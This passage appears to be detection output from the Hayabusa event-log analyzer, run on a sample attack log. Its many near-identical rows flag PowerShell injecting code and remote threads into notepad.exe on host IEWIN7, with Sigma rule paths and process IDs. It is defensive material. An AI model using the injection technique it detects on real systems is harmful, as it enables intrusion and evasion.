Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.505 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.520 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.536 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.551 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.583 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.598 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.614 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.630 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.661 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.692 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.708 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.723 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.739 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.755 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.770 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.801 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.817 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.833 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.848 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.864 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.880 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.895 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.926 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
